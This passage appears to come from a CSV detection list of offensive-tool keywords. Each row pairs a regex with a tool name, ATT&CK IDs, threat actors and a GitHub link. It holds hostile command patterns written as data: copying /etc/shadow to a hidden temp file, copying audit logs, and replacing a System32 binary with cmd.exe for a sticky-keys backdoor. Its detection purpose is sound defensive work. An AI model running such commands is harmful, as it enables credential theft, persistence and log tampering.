T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38914" "*Covenant/wwwroot*",".{0,1000}Covenant\/wwwroot.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - 
T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38915" "*CovenantAPI.*",".{0,1000}CovenantAPI\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38916" "*CovenantAPIExtensions.*",".{0,1000}CovenantAPIExtensions\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38917" "*CovenantBaseMenuItem.*",".{0,1000}CovenantBaseMenuItem\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38918" "*CovenantService.cs*",".{0,1000}CovenantService\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - 
T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38919" "*CovenantUser.cs*",".{0,1000}CovenantUser\.cs.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38920" "*CovenantUserLogin.*",".{0,1000}CovenantUserLogin\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38921" "*CovenantUserLoginResult.*",".{0,1000}CovenantUserLoginResult\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38922" "*CovenantUserRegister.*",".{0,1000}CovenantUserRegister\..{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - 
T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","38923" "*covid19_koadic.profile*",".{0,1000}covid19_koadic\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","38924" 
"*cow-branded-longhorn.txt*",".{0,1000}cow\-branded\-longhorn\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38925" "*cowpatty -f *.txt -r *.cap -s *",".{0,1000}cowpatty\s\-f\s.{0,1000}\.txt\s\-r\s.{0,1000}\.cap\s\-s\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38926" "*Cowpatty*",".{0,1000}Cowpatty.{0,1000}","offensive_tool_keyword","Cowpatty","coWPAtty - Brute-force dictionary attack against WPA-PSK.","T1110 - T1114","TA0006 - 
TA0007","N/A","N/A","Credential Access","https://github.com/joswr1ght/cowpatty","1","1","N/A","network exploitation tool","N/A","3","207","51","2018-12-04T22:26:47Z","2017-08-14T20:33:22Z","38927" "*cowsay -f dragon 'PEzor!!*",".{0,1000}cowsay\s\-f\sdragon\s\'PEzor!!.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","38928" "*cp ""/media/windows/Windows/System32/cmd.exe"" ""/media/windows/Windows/System32/*",".{0,1000}cp\s\""\/media\/windows\/Windows\/System32\/cmd\.exe\""\s\""\/media\/windows\/Windows\/System32\/.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - 
TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","38929" "*cp /etc/shadow /tmp/.*",".{0,1000}cp\s\/etc\/shadow\s\/tmp\/\..{0,1000}","offensive_tool_keyword","EQGR","Equation Group scripts and tools","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Exploitation tool","https://fdik.org/EQGRP/Linux/doc/old/etc/abopscript.txt","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","38933" "*cp /var/log/audit/audit.log .tmp*",".{0,1000}cp\s\/var\/log\/audit\/audit\.log\s\.tmp.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked note defense evasion","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/Auditcleaner","1","0","#linux","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z","38935" "*cp sliver-* /opt/tools/bin*",".{0,1000}cp\ssliver\-.{0,1000}\s\/opt\/tools\/bin.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38939" "*cpp_test_payload.exe*",".{0,1000}cpp_test_payload\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","38940" 
"*Cr3dOv3r*",".{0,1000}Cr3dOv3r.{0,1000}","offensive_tool_keyword","Cr3dOv3r","Know the dangers of credential reuse attacks.","T1110 - T1555 - T1003","TA0006 - TA0040 - TA0003","N/A","N/A","Credential Access","https://github.com/D4Vinci/Cr3dOv3r","1","1","N/A","N/A","N/A","10","2050","413","2024-10-14T19:20:12Z","2017-11-13T20:49:57Z","38943" "*cracf2john.py*",".{0,1000}cracf2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","38944" "*crack_databases.rb*",".{0,1000}crack_databases\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38945" "*crack_it(nt_hash, lm_pass)*",".{0,1000}crack_it\(nt_hash,\slm_pass\).{0,1000}","offensive_tool_keyword","DPAT","Domain Password Audit Tool for Pentesters","T1003 - T1087 - T1110 - T1555","TA0006 - TA0004 - TA0002 - TA0005","N/A","N/A","Credential Access","https://github.com/clr2of8/DPAT","1","0","#content","N/A","10","10","954","156","2022-06-24T21:41:43Z","2016-11-22T22:00:21Z","38946" "*crack_windows.rb*",".{0,1000}crack_windows\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","38947" "*Crack-allDBs.git*",".{0,1000}Crack\-allDBs\.git.{0,1000}","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tool","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","N/A","8","1","54","18","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z","38948" "*Crack-allDBs-main*",".{0,1000}Crack\-allDBs\-main.{0,1000}","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tool","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","N/A","8","1","54","18","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z","38949" "*crack-allDBs-v1.py*",".{0,1000}crack\-allDBs\-v1\.py.{0,1000}","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation tool","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","N/A","8","1","54","18","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z","38950" "*crack-allDBs-v2.py*",".{0,1000}crack\-allDBs\-v2\.py.{0,1000}","offensive_tool_keyword","Crack-allDBs","bruteforce script for various DB","T1110 - T1110.002 - T1210","TA0006 - TA0001","N/A","N/A","Exploitation 
tool","https://github.com/d3ckx1/Crack-allDBs","1","1","N/A","N/A","8","1","54","18","2021-04-08T06:17:31Z","2021-04-07T11:17:00Z","38951" "*Cracked5pider/KaynLdr*",".{0,1000}Cracked5pider\/KaynLdr.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","1","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","38952" "*Cracked5pider/KaynStrike*",".{0,1000}Cracked5pider\/KaynStrike.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","38953" "*crackhound.py --verbose --password * --plain-text * --domain * --file * --add-password *",".{0,1000}crackhound\.py\s\-\-verbose\s\-\-password\s.{0,1000}\s\-\-plain\-text\s.{0,1000}\s\-\-domain\s.{0,1000}\s\-\-file\s.{0,1000}\s\-\-add\-password\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38954" "*cracklord-master.*",".{0,1000}cracklord\-master\..{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential 
Access","https://github.com/jmmcatee/cracklord","1","1","N/A","N/A","10","4","388","70","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z","38955" "*cracklord-queued*_amd64.deb*",".{0,1000}cracklord\-queued.{0,1000}_amd64\.deb.{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","N/A","10","4","388","70","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z","38956" "*cracklord-resourced*_amd64.deb*",".{0,1000}cracklord\-resourced.{0,1000}_amd64\.deb.{0,1000}","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","N/A","10","4","388","70","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z","38957" "*crackmapexec*",".{0,1000}crackmapexec.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec execution name. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38958" "*CrackMapExec*",".{0,1000}CrackMapExec.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38959" "*crackmapexec.exe*",".{0,1000}crackmapexec\.exe.{0,1000}","offensive_tool_keyword","crackmapexec","windows default compiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38960" "*crackmapexec.py*",".{0,1000}crackmapexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Exploitation tool","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","38961" "*crackmapexec.py*",".{0,1000}crackmapexec\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","38962" "*crackmapexec.spec*",".{0,1000}crackmapexec\.spec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - 
T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","38963" "*crackpkcs12*",".{0,1000}crackpkcs12.{0,1000}","offensive_tool_keyword","crackpkcs12","A multithreaded program to crack PKCS#12 files (p12 and pfx extensions) by Aestu","T1110 - T1185 - T1114","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/crackpkcs12/crackpkcs12","1","1","N/A","N/A","N/A","2","153","29","2019-04-26T18:38:11Z","2015-03-19T22:26:17Z","38964" "*crackTGS*",".{0,1000}crackTGS.{0,1000}","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","0","N/A","N/A","N/A","3","202","58","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z","38965" "*Crafting malicious SYN packet*",".{0,1000}Crafting\smalicious\sSYN\spacket.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","38966" "*Crandle_Builder.ps1*",".{0,1000}Crandle_Builder\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - 
T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","38967" "*Crassus.csproj*",".{0,1000}Crassus\.csproj.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","N/A","10","6","571","59","2024-11-08T14:11:39Z","2023-01-12T21:01:52Z","38969" "*Crassus.exe*",".{0,1000}Crassus\.exe.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","1","N/A","N/A","10","6","571","59","2024-11-08T14:11:39Z","2023-01-12T21:01:52Z","38970" "*Crassus.sln*",".{0,1000}Crassus\.sln.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","N/A","N/A","10","6","571","59","2024-11-08T14:11:39Z","2023-01-12T21:01:52Z","38971" "*crate::modules::{rec2mastodon*rec2virustotal}*",".{0,1000}crate\:\:modules\:\:\{rec2mastodon.{0,1000}rec2virustotal\}.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","N/A","10","10","153","23","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z","38972" 
"*CravateRouge/autobloody*",".{0,1000}CravateRouge\/autobloody.{0,1000}","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","#linux","N/A","10","6","545","54","2024-11-14T13:07:54Z","2022-09-07T13:34:30Z","38973" "*CravateRouge/bloodyAD*",".{0,1000}CravateRouge\/bloodyAD.{0,1000}","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","N/A","10","10","1590","145","2025-04-10T10:47:16Z","2021-10-11T15:07:26Z","38974" "*crawlLdrDllList*",".{0,1000}crawlLdrDllList.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF 